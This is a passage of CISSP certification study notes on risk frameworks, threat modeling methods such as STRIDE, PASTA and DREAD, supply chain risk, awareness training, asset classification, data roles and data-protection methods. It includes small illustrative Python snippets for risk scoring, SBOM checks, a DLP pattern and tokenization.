the CSF is a set of guidelines for mitigating organizational cybersecurity risks, based on existing
standards, guidelines, and practices
The RMF is intended as a risk management process to identify and respond to threats, and is defined in
three core, interrelated Special Publications:
SP 800-37 Rev 2, Risk Management Framework for Information Systems and Organizations
SP 800-39, Managing Information Security Risk
SP 800-30 Rev 1, Guide for Conducting Risk Assessments outlines four primary steps to conduct a
risk assessment
Prepare for the assessment
Conduct assessment
identify threat sources and events
identify vulnerabilities and predisposing conditions
determine likelihood of occurrence
determine magnitude of impact
determine risk
Communicate results
Maintain assessment
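The likelihood, impact, and risk determination sub-steps above can be sketched as a simple qualitative calculation (the three-level scale and band thresholds are assumptions for illustration, not taken from SP 800-30):

```python
# Qualitative risk determination (likelihood x impact), per the sub-steps above.
# The scale and band thresholds are illustrative assumptions.
LEVELS = {"low": 1, "moderate": 2, "high": 3}

def determine_risk(likelihood: str, impact: str) -> str:
    """Combine likelihood of occurrence and magnitude of impact into a risk level."""
    score = LEVELS[likelihood] * LEVELS[impact]
    if score >= 6:
        return "high"
    if score >= 3:
        return "moderate"
    return "low"

print(determine_risk("high", "moderate"))  # high (3 * 2 = 6)
print(determine_risk("low", "moderate"))   # low (1 * 2 = 2)
```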
The RMF has seven cyclical steps:
Prepare to execute the RMF from an organization and system-level perspective by
establishing a context and priorities for managing security and privacy risk
Categorize the system and the information processed, stored, and transmitted by the
system based on an analysis of the impact of loss
Select an initial set of controls for the system and tailor the controls as needed to reduce risk
to an acceptable level based on an assessment of risk
Implement the controls and describe how the controls are employed within the system and
its environment of operation
Assess the controls to determine if the controls are implemented correctly, operating as
intended, and producing the desired outcomes with respect to satisfying the security and
privacy requirements
Authorize the system or common controls based on a determination that the risk to
organizational operations and assets, individuals, and other organizations, and the nation is
acceptable
Monitor the system and associated controls on an on-going basis to include assessing
control effectiveness, documenting changes to the system and environment of operation,
conducting risk assessments and impact analysis, and reporting the security and privacy
posture of the system
See my overview article, The NIST Risk Management Framework
There are other risk frameworks, such as the ISO/IEC 31000, ISO/IEC 31004, COSO's ERM, ISACA's Risk
IT, OCTAVE, FAIR, and TARA (Threat Agent Risk Assessment); be familiar with frameworks and their
goals
1.10 Understand and apply threat modeling concepts and methodologies (OSG-10
Chpt 1)
Threat Modeling: security process where potential threats are identified, categorized, and analyzed; can be
performed as a proactive measure during design and development (aka defensive approach) or as a
reactive measure once a product has been deployed (aka adversarial approach)
Threat modeling identifies the potential harm, the probability of occurrence, the priority of concern, and
the means to eradicate or reduce the threat
MITRE ATT&CK (Adversarial Tactics, Techniques, and Common Knowledge): a comprehensive framework
with a globally accessible knowledge base that documents real-world tactics, techniques, and procedures
(TTPs) used by cyber adversaries; it is widely used by organizations to improve threat detection, incident
response, and cybersecurity defenses; ATT&CK is used as a default model in many software packages
Microsoft uses the Security Development Lifecycle (SDL) with the motto: "Secure by design, secure by
default, secure in deployment and communication"
It has two objectives:
Reduce the number of security-related design and coding defects
Reduce the severity of any remaining defects
A defensive approach to threat modeling takes place during the early stages of development; the method is
based on predicting threats and designing in specific defenses during the coding and crafting process
Security solutions are more cost effective in this phase than later; this concept should be considered a
proactive approach to threat management
Microsoft developed the STRIDE threat model:
Spoofing: an attack with the goal of gaining access to a target system through the use of falsified identity
Tampering: any action resulting in unauthorized changes or manipulation of data, whether in transit or in
storage
Repudiation: the ability of a user or attacker to deny having performed an action or activity by maintaining
plausible deniability
Information Disclosure: the revelation or distribution of private, confidential, or controlled information to
external or unauthorized entities
Denial of Service (DoS): an attack that attempts to prevent authorized use of a resource; this can be
done through flaw exploitation, connection overloading, or traffic flooding; for example, a SYN flood is a
DoS attack that disrupts the TCP three-way handshake
Elevation of privilege: an attack where a limited user account is transformed into an account with greater
privileges, powers, and access
STRIDE is a threat categorization model; threat categorization is an important part of app threat modeling
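As a toy illustration of categorizing identified threats into the STRIDE categories (the threat descriptions and mappings are hypothetical):

```python
# Map identified threats to STRIDE categories (hypothetical examples).
STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information Disclosure",
    "D": "Denial of Service",
    "E": "Elevation of Privilege",
}

threats = [
    ("Forged session cookie used to log in", "S"),
    ("Log entries deleted to hide activity", "R"),
    ("SYN flood against the web tier", "D"),
]

for description, category in threats:
    print(f"{STRIDE[category]}: {description}")
```

Categorizing each threat this way helps ensure no class of threat (e.g. repudiation) is overlooked during design review.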
Process for Attack Simulation and Threat Analysis (PASTA): a seven-stage threat modeling methodology:
Stage I: Definition of the Objectives (DO) for the Analysis of Risk
Stage II: Definition of the Technical Scope (DTS)
Stage III: Application Decomposition and Analysis (ADA)
Stage IV: Threat Analysis (TA)
Stage V: Weakness and Vulnerability Analysis (WVA)
Stage VI: Attack Modeling and Simulation (AMS)
Stage VII: Risk Analysis and Management (RAM)
Each stage of PASTA has a specific list of objectives to achieve and deliverables to produce in order to complete
the stage
Visual, Agile, and Simple Threat (VAST): a threat modeling concept that integrates threat and risk
management into an Agile programming environment on a scalable basis
Part of the job of the security team is to identify threats, using different methods:
Focus on attackers: this is a useful method in specific situations
e.g. suppose that a developerʼs employment is terminated, and a post-offboarding review of the
developerʼs computer determines that the person was disgruntled and angry
understanding this situation as a possible threat allows mitigation steps to be taken
Focus on assets: an orgʼs most valuable assets are likely to be targeted by attackers
Focus on software: orgs that develop applications in house can view those applications as part of the
threat landscape; the goal isnʼt to identify every possible attack, but to focus on the big picture, identifying risks
and attack vectors
Understanding threats to the org allows the documentation of potential attack vectors; diagramming can be used
to list various technologies under threat
Reduction analysis: breaking down a system into five core elements (trust boundaries, data flow paths, input
points, privileged operations, and security control details) to gain a greater understanding of the logic of a
product and its interactions with external elements; AKA decomposing the application, system, or
environment
DREAD: Microsoft developed the DREAD threat modeling approach to detect and prioritize threats so that
serious threats can be mitigated first
D: Damage potential
R: Reproducibility
E: Exploitability
A: Affected users
D: Discoverability
Note that STRIDE and DREAD are used together: STRIDE to identify the threats, DREAD to prioritize them
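DREAD prioritization is commonly implemented by averaging the five ratings; a minimal sketch, assuming an illustrative 1-10 rating scale and made-up threats:

```python
# DREAD score: average of Damage, Reproducibility, Exploitability,
# Affected users, Discoverability (1-10 ratings here are hypothetical).
def dread_score(d: int, r: int, e: int, a: int, di: int) -> float:
    return (d + r + e + a + di) / 5

threats = {
    "SQL injection in login form": dread_score(9, 9, 7, 8, 8),
    "Verbose error pages": dread_score(3, 10, 9, 2, 9),
}

# Mitigate the highest-scoring threat first
for name, score in sorted(threats.items(), key=lambda kv: kv[1], reverse=True):
    print(f"{score:.1f}  {name}")
```

This pairs naturally with STRIDE as described above: STRIDE supplies the threat list, DREAD supplies the ranking.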
Trike: an open source risk-based threat modeling methodology; provides a method of performing a reliable and
repeatable security audit, and a framework for collaboration and communication
Threat intelligence feed standards include:
CAPEC (Common Attack Pattern Enumeration and Classification): a dictionary of known attack
patterns
STIX (Structured Threat Information eXpression language): used to describe threats in a
standardized way
TAXII (Trusted Automated eXchange of Indicator Information): defines how threat information can be
shared and exchanged
1.11 Apply Supply Chain Risk Management (SCRM) concepts (OSG-10 Chpt 1)
1.11.1 Risks associated with the acquisition of products and services from suppliers and providers (e.g., product
tampering, counterfeits, implants)
Supply Chain Risk Management (SCRM): the means to ensure that all of the vendors or links in the
supply chain are:
reliable,
trustworthy,
reputable organizations that disclose their practices and security requirements to their business
partners (not necessarily to the public)
Each link in the chain should be responsible and accountable to the next link in the chain; each handoff
should be properly organized, documented, managed, and audited
The goal of a secure supply chain is that the finished product is of sufficient quality, meets
performance and operational goals, provides stated security mechanisms, and that at no point in
the process was any element counterfeited or subject to unauthorized or malicious manipulation or
sabotage
The supply chain can be a threat vector, where materials, software, hardware, or data is being obtained
from a supposedly trusted source, but the supply chain behind the source could have been compromised
and the asset poisoned or modified
Supply chain attacks include things like product tampering, counterfeits, or implants; these attacks can
be difficult to detect, and changes or manipulations can be via hardware (even miniaturized chips), or via
software
choosing trusted and reputable vendors, and doing security monitoring, management and
assessments are important to lower these risks
1.11.2 Risk mitigations (e.g., third-party assessment and monitoring, minimum security requirements, service
level requirements, silicon root of trust, physically unclonable function, software bill of materials)
Before doing business with another company, an org needs to perform due diligence, and third-party
assessments can help gather information and perform the assessment
An on-site assessment is useful to gain information about physical security and operations
During document review, your goal is to thoroughly review all the architecture, designs,
implementations, policies, procedures, etc.
the goal is a good understanding of the current state of the environment, especially any
shortcomings or compliance issues, prior to integrating the IT infrastructures
The level of access and depth of information obtained is usually proportional to how closely the
companies will work together
Creating security requirements that dovetail with SLAs and contracts is important, as is including things
like a silicon root of trust (RoT) (AKA hardware root of trust) to provide integrity, authenticity, and
confidentiality as a foundation of system startup security
Physically unclonable function (PUF): physical component that creates a unique digital identifier that
can create an electronic fingerprint for integrated circuits or devices
Software Bill of Materials (SBOM): a detailed list of all components, libraries, and dependencies
(including open-source and proprietary code) included in a software app; the purpose is to provide better
software transparency, security, and compliance, helping teams address risks and track vulnerabilities
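SBOMs are commonly exchanged as JSON (CycloneDX and SPDX are the dominant formats); this minimal sketch, with hypothetical component and vulnerability data, shows how an SBOM supports vulnerability tracking:

```python
import json

# Minimal CycloneDX-style SBOM fragment (contents are hypothetical).
sbom_json = """
{
  "bomFormat": "CycloneDX",
  "components": [
    {"name": "openssl", "version": "1.1.1"},
    {"name": "log4j-core", "version": "2.14.1"}
  ]
}
"""

# Toy vulnerability list (illustrative, not a real feed).
known_vulnerable = {("log4j-core", "2.14.1"), ("openssl", "1.0.2")}

sbom = json.loads(sbom_json)
for comp in sbom["components"]:
    if (comp["name"], comp["version"]) in known_vulnerable:
        print(f"VULNERABLE: {comp['name']} {comp['version']}")
```

The value of the SBOM is exactly this kind of query: when a new vulnerability is announced, affected products can be identified without re-auditing every codebase.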
1.12 Establish and maintain a security awareness, education, and training program
(OSG-10 Chpt 2)
1.12.1 Methods and techniques to increase awareness and training (e.g., social engineering, phishing, security
champions, gamification)
Before actual training takes place, user security awareness needs to be established; from there, training
(teaching employees to perform their work tasks and to comply with the security policy) can begin
All new employees require some level of training so that they will be able to comply with all
standards, guidelines, and procedures mandated by the security policy
Education is a more detailed endeavor in which students/users learn much more than they actually
need to know to perform their work tasks
Education is most often associated with users pursuing certification or seeking job promotion
Employees need to understand what to be aware of (e.g. types of threats, such as phishing and free USB
sticks), how to perform their jobs securely (e.g. encrypt sensitive data, physically protect valuable assets),
and how security plays a role in the big picture (company reputation, profits, and losses)
Training should be mandatory and provided both to new employees and yearly (at a minimum) for
ongoing training
Routine tests of operational security should be performed (such as phishing test campaigns,
tailgating at company doors and social engineering tests)
Social engineering: a form of attack that exploits human nature and behavior; the common social
engineering principles are authority, intimidation, consensus, scarcity, familiarity, trust, and urgency
familiarity: as a social engineering principle, an attempt to exploit someone's native trust in
things that are familiar; might include claiming to know a coworker (existing or not), and
designed to put the target in a mindset that promotes willingness to provide info
social engineering attacks include phishing, spear phishing, business email compromise
(BEC), whaling, smishing, vishing, spam, shoulder surfing, invoice scams, hoaxes,
impersonation, masquerading, tailgating, piggybacking, dumpster diving, identity fraud, typo
squatting, and influence campaigns
while many orgs donʼt perform social engineering campaigns (testing employees using
benign social engineering attempts) as part of security awareness, it is likely to gain traction
outside of campaigns, presenting social engineering scenarios and information is a common
way to educate
Phishing: phishing campaigns are popular, and many orgs use third-party services to routinely test
their employees with fake phishing emails
such campaigns produce valuable data, such as the percentage of employees who open the
phishing email, the percentage who open attachments or click links, and the percentage who
report the fake phishing email as malicious
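The campaign percentages described above are simple ratios; a minimal sketch with made-up counts:

```python
# Phishing test campaign metrics (all counts are hypothetical).
sent = 200
opened_email = 90
clicked_link = 30
reported = 50

print(f"open rate:   {opened_email / sent:.0%}")   # 45%
print(f"click rate:  {clicked_link / sent:.0%}")   # 15%
print(f"report rate: {reported / sent:.0%}")       # 25%
```

Tracking these rates across campaigns (rather than in a single test) is what shows whether awareness training is actually improving behavior.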
Security champions: the term "champion" has been gaining ground; orgs often use it to designate a
person on a team who is a subject matter expert in a particular area or responsible for a specific
area
e.g. somebody on the team could be a monitoring champion — they have deep knowledge
around monitoring and evangelize the benefits of monitoring to the team or other teams
a security champion is a person responsible for evangelizing security, helping bring security
to areas that require attention, and helping the team enhance their skills
Gamification: legacy training and education are typically based on reading and then answering
multiple-choice questions to prove knowledge; gamification aims to make training and education
more fun and engaging by packing educational material into a game
gamification has enabled organizations to get more out of the typical employee training
Security champions also act as liaisons between their team and the security team, promoting
secure development practices and helping integrate security into daily workflows
1.12.2 Periodic content reviews to include emerging technologies and trends (e.g., cryptocurrency, artificial
intelligence (AI), blockchain)
On-going training (or teaching people how to perform their tasks and comply with policies) and education
(teaching students/users more than they need to know to perform specific tasks) is important as is
developing security champions
It's also important to periodically review training material content, especially in regard to the fast pace of
change of newer technologies such as AI, blockchain and even cryptocurrencies
emerging tech trends should be incorporated into training materials
not only material updates, but methods should also be updated to keep content and approach
relevant and from getting stale
Threats are complex, so training needs to be relevant and interesting to be effective; this means updating
training materials and changing out the ways in which security is tested and measured
if you always use the same phishing test campaign or send it from the same account on the same
day, it isnʼt effective, and the same applies to other materials
instead of relying on long/detailed security documentation for training and awareness, consider
using internal social media tools, videos and interactive campaigns
1.12.3 Program effectiveness evaluation
Time and money must be allocated for evaluating the companyʼs security awareness and training; the
company should track key metrics, such as the percentage of employees who click on a fake phishing
campaign email links
Also see my articles on risk management:
Part 1 introduces risk and risk terminology from the lens of the (ISC)² Official Study Guide
Since the primary goal of risk management is to identify potential threats against an organization's assets, and
bring those risks into alignment with an organization's risk appetite, in Part 2, we cover the threat assessment --
a process of examining and evaluating cyber threat sources with potential system vulnerabilities
we look at how a risk assessment helps drive our understanding of risk by pairing assets and their
associated potential threats, ranking them by criticality
we also discuss quantitative analytic tools to help provide specific numbers for various potential risks,
losses, and costs
In the third installment, we review the outcome of the risk assessment process, looking at total risk, allowing us
to determine our response to each risk/threat pair and perform a cost/benefit review of a particular safeguard or
control
we look at the categories and types of controls and the idea of layering them to provide several different
types of protection mechanisms
we also review the important step of reporting out our risk analysis and recommended responses, noting
differences in requirements for messaging by group
Domain-2 Asset Security
Domain 2 of the CISSP exam covers asset security, making up ~10% of the test
Asset security includes the concepts, principles, and standards of monitoring and securing any asset important
to the organization
The Asset Security domain focuses on collecting, handling, and protecting information throughout its lifecycle;
the first step is classifying information based on its value to the organization
Anonymization: replaces privacy data with useful but inaccurate data; the dataset can be shared, but
anonymization removes individual identities; anonymization is permanent
Asset: anything of value owned by the organization
Asset lifecycle: phases an asset goes through, from creation (or collection) to destruction
EPROM / UVEPROM: erasable programmable read-only memory, a type of programmable read-only memory
(PROM) chip that retains its data when its power supply is switched off; chips may be erased with ultraviolet light
EEPROM: Electrically Erasable Programmable Read-Only Memory; chips may be erased with electrical current
PROM: programmable read-only memory, a form of digital memory where the contents can be changed once
after manufacture of the device
RAM: Random Access Memory - volatile memory that loses contents when the computer is powered off
Randomized masking: an anonymization method that cannot be reversed when done correctly
ROM: nonvolatile memory that can't be written to by end users
TEMPEST: a classification of technology designed to minimize the electromagnetic emanations generated by
computing devices; TEMPEST technology makes it difficult, if not impossible, to compromise confidentiality by
capturing emanated information; TEMPEST countermeasures to Van Eck phreaking (i.e. eavesdropping), include
Faraday cages, white noise, control zones, and shielding
2.1 Identify and classify information and assets (OSG-10 Chpt 5)
2.1.1 Data classification
Managing the data lifecycle refers to protecting it from cradle to grave -- steps need to be taken to
protect data when it's first created until it's destroyed
One of the first steps in the lifecycle is identifying and classifying information and assets, often within a
security policy
In this context, assets include sensitive data, the hardware used to process that data, and the media used
to store/hold it
Data categorization: process of grouping sets of data, info or knowledge that have comparable
sensitivities (e.g. impact or loss rating), and have similar law/contract/compliance security needs; the act
of assigning a classification level to an asset
Sensitive data: any information that isn't public or unclassified, and can include anything an org needs to
protect due to its value, or to comply with existing laws and regulations
Personally Identifiable Information (PII): any information that can identify an individual
more specifically, info about an individual including (1) any info that can be used to distinguish or
trace an individualʼs identity, such as name, social security number, date and place of birth,
motherʼs maiden name, or biometric records; and (2) any other information that is linked or linkable
to an individual, such as medical, educational, financial, and employment information (NIST SP
800-122)
Protected Health Information (PHI): any health-related information in any form that can be related to a
specific person; note that HIPAA applies to healthcare providers, health insurers, clearinghouses, and any
org that handles PHI
Proprietary data: any data that helps an organization maintain a competitive edge
Organizations classify data using labels
government classification labels include:
Top Secret: if disclosed, could cause massive damage to national security, such as the
disclosure of spy satellite information
Secret: if disclosed, can adversely affect national security
Confidential: if disclosed, could cause damage to national security
Unclassified: not sensitive
non-government organizations use labels such as:
Confidential/Proprietary: only used within the org; in the case of unauthorized
disclosure, the org could suffer serious consequences
Private: may include personal information, such as credit card data and bank accounts;
unauthorized disclosure can be disastrous
Sensitive: needs extraordinary precautions to ensure confidentiality and integrity
Public: can be viewed by the general public and, therefore, the disclosure of this data would
not cause damage
labels can be as granular and custom as required by the org
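Because classification labels are ordered by sensitivity, a simple access check can compare a subject's clearance against an object's label; this sketch uses the non-government labels above, with illustrative enforcement logic:

```python
# Ordered non-government classification levels (higher index = more sensitive).
LEVELS = ["public", "sensitive", "private", "confidential"]
RANK = {label: i for i, label in enumerate(LEVELS)}

def can_read(subject_clearance: str, object_label: str) -> bool:
    """Allow read only if the clearance dominates the object's classification."""
    return RANK[subject_clearance] >= RANK[object_label]

print(can_read("private", "sensitive"))      # True
print(can_read("sensitive", "confidential")) # False
```

Real systems layer need-to-know and other constraints on top of this ordering; the sketch shows only the label-comparison step.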
It is important to protect data in all states: at rest, in transit, or in use
The best way to protect data confidentiality is via use of strong encryption
2.1.2 Asset Classification
It's important to identify and classify assets, such as systems, mobile devices etc.
Owners are accountable for an asset and protecting its value
Asset Classification: assigning assets the level of protection required based on their value to the org;
assets require an identified owner to be classified and protected adequately; classification is derived from
compliance mandates and from the process of recognizing organizational impacts if information suffers any
security compromise (whether to confidentiality, integrity, availability, non-repudiation, authenticity, privacy, or
safety)
Asset classifications should match data classification, i.e. if a computer is processing top secret data, the
computer should be classified as a top secret asset
Clearance: relates to access to a certain classification level of data or equipment, and who has access to
that level or classification
A formal access approval process should be used to change user access; the process should involve
approval from the data/asset owner, and the user should be informed about rules and limits
before a user is granted access they should be educated on working with that level of classification
Classification levels can be used by businesses during acquisitions, ensuring only personnel who need to
know are involved in the assessment or transition
In general, classification labels help users use data and assets properly, for instance by restricting
dissemination or use of assets by their classification
Asset classification should include confidentiality (sensitivity), integrity (accuracy), and availability
(criticality)
2.2 Establish information and asset handling requirements (OSG-10 Chpt 5)
Asset handling: procedures that mitigate risks associated with who moves assets and how they are moved,
stored, and retrieved, ensuring proper tools and technologies are used; handling requirements are based on the
classification of the asset (not the media type); handling can refer to secure transport of media through its lifetime
The data and asset handling key goal is to prevent data breaches, by using:
Data Maintenance: on-going efforts to organize and care for data through its life cycle
Data collection limitations: only store data that has a clear business purpose
Data Loss Prevention (DLP): systems that detect and block data exfiltration attempts; three primary
types:
network-based DLP: placed on the edge of a network, scans all outgoing network data
endpoint-based DLP: scans stored files and can be used to prevent printing or copying sensitive
data to removable storage
cloud-based DLP: similar to network DLP but designed specifically for cloud-native environments
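The rule-matching core of any of these DLP types can be sketched in a few lines; the regex and block decision below are illustrative assumptions, not a real product's rule engine:

```python
import re

# Illustrative DLP rule (an assumption, not a real product's rule syntax):
# flag payloads containing a US Social Security Number pattern.
SSN_PATTERN = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")

def should_block(payload: str) -> bool:
    """Return True if the payload matches the exfiltration rule."""
    return bool(SSN_PATTERN.search(payload))

print(should_block("Invoice total: 1,234.56"))    # False -- benign traffic
print(should_block("SSN on file: 078-05-1120"))   # True  -- rule triggers
```

A network-based DLP would apply such rules to traffic at the network edge; an endpoint-based DLP would apply them to files at rest or being copied.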
Labeling: the association of security attributes with subjects and objects represented by internal data
structures; labels are system-readable and enable system-based enforcement of security policies; labeling
often uses things like: metadata, barcodes, QR codes, RFID or GPS tags
Marking: association of security attributes in a human-readable form, enabling process-based enforcement of
security policies; marking sensitive information/assets ensures proper handling (both physically and electronically)
Data Collection Limitation: prevent loss by not collecting unnecessary sensitive data; a best practice when
collecting customer data, for instance, is to limit the amount of data collected to only what is needed
Data Location: keep duplicate copies of backups, both on-site and off-site
Storage: data storage and associated media are based on the classification of the data; define storage
locations and procedures by storage type; use physical locks for paper-based media, and encrypt electronic
data
Destruction: retention and destruction of data should be based on data classification and archiving policies;
destroy data no longer needed by the organization; policy should define acceptable destruction methods by
data classification
an org should keep track of intangible assets, like intellectual property (patents, trademarks, and
copyrights) and the company's reputation, to protect them
note: patents in the US are valid for 20 years
2.3.3 Asset management
Asset management refers to managing both tangible and intangible assets; this starts with inventories of
assets, tracking the assets, and taking additional steps to protect them throughout their lifetime
The primary goal of asset management is to prevent losses (by tracking and protecting assets)
Accountability: ensured through account management; verifies that only authorized users are accessing a
system and using it properly
Hardware assets: IT resources such as computers, servers, routers, switches and peripherals
use an automated configuration management system (CMS) to help with hardware asset
management
use barcodes, RFID tags to track hardware assets
Software assets: operating systems and applications
important to monitor license compliance to avoid legal issues
software licensing also refers to ensuring that systems do not have unauthorized software installed
To protect intangible assets (like intellectual property, patents, trademarks, copyrights, and the
company's reputation), they need to be tracked
2.4 Manage data lifecycle (OSG-10 Chpt 5)
2.4.1 Data roles (i.e., owners, controllers, custodians, processors, users/subjects)
System owner: controls the computer storing the data; usually includes software and hardware
configurations and support services (e.g. cloud implementation)
data owner is the person responsible for classifying, categorizing, and permitting access to the
data; the data owner is the person most familiar with the importance of the data to the
business
system owners are responsible for the systems that process the data
system owner is responsible for system operation and maintenance, and associated
updating/patching as well as related procurement activities
per NIST SP 800-18, information system owner has the following responsibilities:
responsible for the security of the system that stores or processes the data
develops the system security plan
maintains the system security plan and ensures that the system is deployed/operated
according to security requirements
ensures that system users and support personnel receive the requisite security training
updates the system security plan as required
assists in the identification, implementation, and assessment of the common security
controls
Data controller: decides what data to process and how to process it
the data controller is the person or entity that controls the processing of the data - deciding what
data to process, why this data should be processed, and how it is processed
e.g. a company that collects personal information on employees for payroll is a data controller (but,
if they pass this info to a third-party to process payroll, the payroll company is the data processor,
see below)
Data processor: an entity working on behalf (or the direction) of the data controller, that processes PII;
they have a responsibility to protect the privacy of the data and not use it for any purpose other than
directed by the data controller; generally, a data processor is any system used to process data
processing data on behalf of the Data Controller while ensuring quality, validation, and compliance,
safe custody, transport, storage of the data and implementation of business rules
a controller can hire a third party to process data, and in this context, the third party is the data
processor; data processors are often third-party entities that process data for an org at the
direction of the data controller
note GDPR definition: "a natural or legal person, public authority, agency, or other body, which
processes personal data solely on behalf of the data controller"
GDPR also restricts data transfers to countries outside EU, with fines for violations
many orgs have created dedicated roles to oversee compliance with GDPR data protection requirements
Data custodian: a custodian is delegated, from the system owner, day-to-day responsibilities for
properly storing and protecting data; responsible for the protection of data through maintenance
activities, backing up and archiving, and preventing the loss or corruption and recovering data
Data steward: a data steward has business responsibility for data (e.g. data quality, governance,
compliance, metadata definition etc)
Security administrator: responsible for ensuring the overall security of the entire infrastructure; they
perform tasks that lead to the discovery of vulnerabilities, monitor network traffic and configure tools to
protect the network (like firewalls and antivirus software)
security admins also devise security policies, plans for business continuity and disaster recovery
and train staff
Supervisors: responsible for overseeing the activities of all the above entities and all support personnel;
they ensure team activities are conducted smoothly and that personnel are properly skilled for the tasks
assigned
Users: any person who accesses data from a computer device or system to accomplish work (think of
users as employees or end users)
users should have access to the data they need to perform tasks; users should have access to data
according to their roles and their need to access info
must comply with rules, mandatory policies, standards and procedures
users fall into the category of subjects, and a subject is any entity that accesses an object such as
a file or folder
note that subjects can be users, programs, processes, services, computers, or anything else
that can access a resource
2.4.2 Data collection
One of the easiest ways of preventing the loss of data is to simply not collect it
The data collection guideline: if the data doesn't have a clear purpose for use, don't collect it, and don't
store it; this is why many privacy regulations mention limiting data collection
2.4.3 Data location
Data location: in this context, refers to the location of data backups or data copies
If a company's systems are on-prem and data is kept on-site but regularly backed up, best practice is to
keep one backup copy on-site and another backup copy off-site
Consider distance between data/storage locations to mitigate potential mutual (primary and backup)
damage risk
2.4.4 Data maintenance
Data maintenance: managing data through the data lifecycle (creation, usage, retirement); data
maintenance is the process (often automated) of making sure the data is available (or not available)
based on where it is in the lifecycle
Ensuring appropriate asset protection requires that sensitive data be preserved at least as long as the
business requires, but no longer than necessary
2.6 Determine data security controls and compliance requirements (OSG-10 Chpt 5)
You need security controls that protect data in each possible state: at rest, in transit or in use
Each state requires a different approach to security; note that there arenʼt as many security options for data in
use as there are for data at rest or data in transit
keeping systems patched, maintaining a standard computer build process, and running anti-virus/anti-malware
software are typically the primary real-world protections for data in use
2.6.1 Data states (e.g., in use, in transit, at rest)
The three data states are at rest, in transit, and in use
Data at rest: any data stored on media such as hard drives or external media
Data in transit: AKA data in motion; any data transmitted over a network
encryption methods protect data at rest and in transit
Data in use: data in memory and used by an application
applications should flush memory buffers to remove data after it is no longer needed
2.6.2 Scoping and tailoring
Baseline: documented, lowest level of security config allowed by a standard or org
After selecting a control baseline, orgs fine-tune with tailoring and scoping processes; a big part of the
tailoring process is aligning controls with an org's specific security requirements
Tailoring: refers to modifying the list of security controls within a baseline to align with the org's mission
includes the following activities:
identifying and designating common controls
specifying organization-defined parameters in the security controls via explicit
assignment and selection statements
applying scoping guidance/considerations
selecting/specifying compensating controls
assigning control values
Scoping: setting the boundaries of security control implementation; limiting the general baseline
recommendations by removing those that do not apply; part of the tailoring process and refers to
reviewing a list of baseline security controls and selecting only those controls that apply to the systems
you're trying to protect
scoping processes eliminate controls that are recommended in a baseline
2.6.3 Standards selection
Organizations need to identify the standards (e.g. PCI DSS, GDPR etc) that apply and ensure that the
security controls they select fully comply with these standards
Even if the org doesn't have to comply with a specific standard, using a well-designed community
standard can be helpful (e.g. NIST SP 800 documents)
Standards selection: the process by which organizations plan, choose and document technologies or
architectures for implementation
e.g. you evaluate three vendors for a security control; you could use a standards selection process
to help determine which solution best fits the org
Vendor selection is closely related to standards selection but focuses on the vendors, not the
technologies or solutions
The overall goal is to have an objective and measurable selection process
if you repeat the process with a totally different team, the alternate team should come up with the
same selection
2.6.4 Data protection methods (e.g., Digital Rights Management (DRM), Data Loss Prevention (DLP), Cloud
Access Security Broker (CASB))
Data protection methods include:
digital rights management (DRM): methods used in attempt to protect copyrighted materials;
purpose is to prevent the unauthorized use, modification, and distribution of copyrighted works
Cloud Access Security Brokers (CASBs): software placed logically between users and cloud-
based resources ensuring that cloud resources have the same protections as resources within a
network
CASB is a solution for security policy enforcement, ensuring security policies and compliance
are met when accessing cloud apps and data; it can be used on-premise or in the cloud
the four cornerstones of CASBs are visibility, data security, threat detection, and compliance
note that entities subject to the EU GDPR must use additional data protection
methods/controls such as anonymization and randomized masking (which, when done correctly,
can't be reversed), or quasi-anonymization, which can be reversed (pseudonymization,
tokenization, encryption)
One of the primary methods of protecting the confidentiality of data is encryption
Options for protecting your data vary depending on its state:
Data at rest: consider encryption for operating system volumes and data volumes, and backups as
well
be sure to consider all locations for data at rest, such as tapes, USB drives, external drives,
RAID arrays, SAN, NAS, and optical media
DRM is useful for data at rest because DRM "travels with the data" regardless of the data
state
DRM is especially useful when you canʼt encrypt data volumes
Data in transit: think of data in transit holistically -- moving data from anywhere to anywhere; use
encryption for data in transit
e.g. a web server uses a certificate to encrypt data being viewed by a user, or IPsec
encrypting a communication session
most important point is to use encryption whenever possible, including for internal-only web
apps
DLP solutions are useful for data in transit: they scan data on the wire and stop the
transmission/transfer based on the configured DLP rule set (e.g. a rule can block outbound
traffic containing numbers that match a Social Security number pattern)
Data in use:
CASB solution often combines DLP, a web application firewall with some type of
authentication and authorization, and a network firewall in a single solution; a CASB solution
is helpful for protecting data in use (and data in transit)
Pseudonymization: refers to the process of using pseudonyms to represent other data; process of
replacing data elements with pseudonyms or aliases
A pseudonym is an alias, and pseudonymization can prevent data from directly identifying an entity
(i.e. person)
An external dataset holds the original data along with the pseudonym such that the original data
can be recreated
Therefore, unlike full anonymization, pseudonymized data can be reversed if the key is available
Tokenization: use of a token, typically a random string of characters, to replace other data
note that tokenization is similar to pseudonymization in that they are both used to represent other
data, and the token or pseudonym have no meaning or value outside the process that creates and
links them to that data
example of tokenization used in CC transactions:
registration: app on user's smart phone securely sends CC info to the credit card processor (CCP)
The CCP sends the CC info to a tokenization vault, creating a token and associating it with
the user's phone
usage: when the user makes a purchase, the POS system sends the token to the CCP for
authorization
validation: the CCP sends the token to the tokenization vault; the vault replies with the CC info, the
charge is processed
completing the sale: the CCP sends a reply to the POS indicating the charge is approved
this system prevents CC theft at the POS system
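The vault-and-token flow above can be sketched as follows (a hypothetical in-memory vault for illustration, not a production design):

```python
import secrets

# Hypothetical tokenization vault: maps random tokens to the real card
# numbers, so the PAN itself never leaves the vault.
class TokenVault:
    def __init__(self):
        self._store = {}

    def tokenize(self, card_number: str) -> str:
        token = secrets.token_hex(8)   # random; meaningless outside the vault
        self._store[token] = card_number
        return token

    def detokenize(self, token: str) -> str:
        return self._store[token]      # only the vault can reverse the mapping

vault = TokenVault()
token = vault.tokenize("4111 1111 1111 1111")

# The POS system only ever sees and stores the token:
assert token != "4111 1111 1111 1111"
assert vault.detokenize(token) == "4111 1111 1111 1111"
```

Stealing the token from the POS system is useless to an attacker, because only the vault can map it back to the card number.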
Domain-3 Security Architecture and Engineering
You may find this domain to be more technical than others, and if you have experience working in a security
engineering role you likely have an advantage; if not, allocate extra time to this domain to ensure you have a good
understanding of the topics; domain 3 is weighted around 13%
Advanced Encryption Standard (AES): uses the Rijndael symmetric algorithm and is the US gov standard for
the secure exchange of sensitive but unclassified data; AES uses key lengths of 128, 192, and 256 bits, and a
fixed block size of 128 bits, achieving a higher level of security than the older DES algorithm
Algorithm: a mathematical function that is used in the encryption and decryption process; can be simple or
